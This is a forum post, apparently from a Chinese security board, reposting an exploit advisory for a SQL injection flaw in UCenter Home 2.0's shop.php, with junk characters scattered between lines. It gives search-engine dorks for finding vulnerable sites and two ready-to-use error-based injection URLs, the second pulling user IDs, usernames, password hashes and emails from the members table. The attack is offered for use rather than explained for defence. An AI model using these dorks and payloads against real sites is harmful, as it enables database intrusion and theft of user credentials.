找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2175|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
. Z! E  D+ I1 E* W" t) ~. z, S$ p) X
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
) p( s$ c2 L8 V! w6 a" S  X+ R7 O( Z) z. @* v  X
                                 4 Y. `7 w% T3 b4 B9 Z

; K. c) Y/ }4 l8 g*/ Author : KnocKout  ! X% [# E4 V2 F- i* ]& ]
% o# |! ^6 `# e% C- C4 u4 A( x
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  , G7 [1 k" r: D( l

( m# S1 l9 Z, I: d$ q*/ Contact: knockoutr@msn.com  
# j$ d6 ~& J: c6 N* l
+ `& o4 v; }) E3 P*/ Cyber-Warrior.org/CWKnocKout  & f. F/ C, v8 k$ Q

) s1 s& f1 r% M* a7 o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
4 b/ H' E# j6 d! n6 w+ I0 q' ~/ F: K4 X4 K# B
Script : UCenter Home  
7 I" H  R" \3 t" v8 j' c, R
  F  |' D+ ^( g. d) \Version : 2.0  
+ e8 Z$ z" i/ E) z% x
' r; m+ A5 P+ [4 DScript HomePage : http://u.discuz.net/  
; B1 r+ Z- X* W" f* k. Z/ [/ D, s+ o1 c. p5 G1 p% q8 p8 ~- [
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  % b( q1 K2 n3 _/ k0 E* Z% ?

# Z7 f3 X1 g6 d* h! gDork : Powered by UCenter inurl:shop.php?ac=view  6 Z2 j" m' c! \) Y

4 C( I7 d# C$ `/ iDork 2 : inurl:shop.php?ac=view&shopid=  , y0 D, t. n  q# f5 D. p7 u, h3 G

3 @: p7 h# }2 h: V, a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ( I5 ?4 U" R! g; {5 N! z
; X. R5 M( c2 K7 i) C% X( J
Vuln file : Shop.php  7 p! {+ C& H& |1 ~7 o/ V  D

6 q# g: X0 a' Nvalue's : (?)ac=view&shopid=  
+ Y. W+ L' V9 G$ n
6 H% N( O- j( t, Z% X, }Vulnerable Style : SQL Injection (MySQL Error Based)    ]- x" v: c3 L$ a) `% @
/ Y* a3 [5 g! X
Need Metarials : Hex Conversion  / m5 u3 H4 |' K0 ^3 a* W8 H2 V

$ s% O" ~7 U, k# T6 Q) L__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
) ?! k$ A: R& X. s5 W. W
0 D$ r) V- ^, R, q0 p$ S3 L' y- sYour Need victim Database name.   
4 a7 n% {" j0 P$ T$ r' [0 A) P" n& m+ l7 O% X8 M3 l1 ]
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
8 \$ i' Y' w# |# [3 B" }; `6 S  `7 U# k& W# G* C. |
..  7 A3 C0 s; F% r9 a* K' Y

* I7 Q2 k% {1 j& qDB : Okey.  9 d/ E& A0 o) `3 `2 Y

; S  F. V7 I  g# [your edit DB `[TARGET DB NAME]`  
1 \/ z) f: v  U0 k" O) ]1 Z; h9 [* f
Example : 'hiwir1_ucenter'  
1 U" |, r1 t/ Y& p; @, i: \" ?" I* i5 ^! t( R3 ?
Edit : Okey.  1 y0 A  I9 l" Q, b% J

' @$ _9 L5 d* N5 g5 _) wYour use Hex conversion. And edit Your SQL Injection Exploit..  8 c. X  C% `9 H8 D# q
; V. `' A  g/ H% v" q$ B
   / x6 p  K' z) k' M$ d! y# Q

/ q# k' a; i" q/ gExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
- s2 m; N! K" w7 N; R" P% z9 a/ ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表